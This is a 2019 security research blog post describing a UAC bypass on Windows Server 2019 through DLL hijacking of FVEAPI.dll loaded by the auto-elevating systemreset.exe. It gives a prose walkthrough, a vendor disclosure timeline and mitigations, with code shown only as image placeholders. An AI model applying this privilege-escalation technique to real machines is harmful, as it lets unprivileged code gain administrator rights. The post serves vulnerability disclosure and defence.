Active Cyber
  • Home
  • About
  • Team
  • Services
  • Careers
  • News
  • Contact
  • ActiveLabs
ACTIVELabs
Powered by ACTIVECYBER, LLC

UAC Bypass in System Reset Binary via DLL Hijacking

4/10/2019

0 Comments

 
​To continue our journey in the realm of bypassing UAC (see previous work here), we’ve decided to investigate Windows Server 2019. Please note this blog post is not a UAC primer but if you need to learn more about the subject, we think Wikipedia is a good place to start. The following is the process used to find a new UAC bypass in systemreset.exe binary using DLL Hijacking method. The technique was tested on Windows Server 2019 Version 1809 (OS Build 17763.404) and its still valid as of this writing.
Picture
​Examining the manifest file shows the binary “autoElevate” property is set to true:
Picture
​So we set Procmon64.exe with the following self-explanatory filters:
Picture
We then let it run while executing systemreset.exe and quickly notice the binary is trying to load FVEAPI.dll from a user-controlled folder in high-integrity context due to the PATH variable:
Picture
Picture
We built a relatively simple DLL that would spawn calc.exe when PoppingCalc() function gets invoked using DllMain and then use rundll32.exe to test it:
Picture
Now executing the problematic binary with the newly created DLL in place shows the following error message:
Picture
As the error message suggests, ResetEngine.dll failed to locate FveGetStatus() function in FVEAPI.dll, using this information we identify the list of exported functions required by ResetEngine.dll via the import table:
Picture
We update FVEAPI.dll with the missing exported functions and then confirm functionality via dumpbin.exe. The full proof-of-concept code can be found here.
Picture
​Here is the demo:
​We did report this to MSRC and received the following response:
Picture
This particular technique can be remediated by setting the UAC level to “Always Notify” or taking away local administrative rights. We hope you’ve learned something from this blog post and feel free to reach out at labs@activecyber.us if you have any questions.
  
Disclosure Timeline
  • 03-28-19: Report sent to MSRC
  • 03-28-19: MSRC acknowledged report and case manager was assigned
  • 04-01-19: MSRC responded stating they do not service UAC bypasses and consider the matter resolved
  • 04-10-19: Blog post released
0 Comments

Your comment will be posted after it is approved.


Leave a Reply.

    Archives

    February 2023
    July 2021
    November 2020
    August 2020
    July 2020
    June 2020
    April 2020
    March 2020
    February 2020
    November 2019
    August 2019
    May 2019
    April 2019
    March 2019

    ACTIVELabs was created in 2018 to hunt and research undiscovered vulnerabilities, report them to vendors via responsible disclosure programs, publish advisories, develop and validate new patches, and to share this information for the advancement of the cybersecurity community. ACTIVELabs was established with the mission of securing our ever-growing client base, partnerships, and the technology community as a whole.
     
    We are actively providing the community with verified findings and research that leads to the creation of new Common Vulnerabilities and Exposures (CVEs) and updates to the National Vulnerability Database (NVD). For a full listing of all of our Advisories, visit our GitHub page here.

    RSS Feed

ACTIVECYBER, LLC
888 Bestgate Road, Suite 316
​Annapolis, MD 21401  202.499.3774
©2022 ACTIVECYBER, LLC  | All rights reserved  |  Privacy Policy
Picture
Picture
  • Home
  • About
  • Team
  • Services
  • Careers
  • News
  • Contact
  • ActiveLabs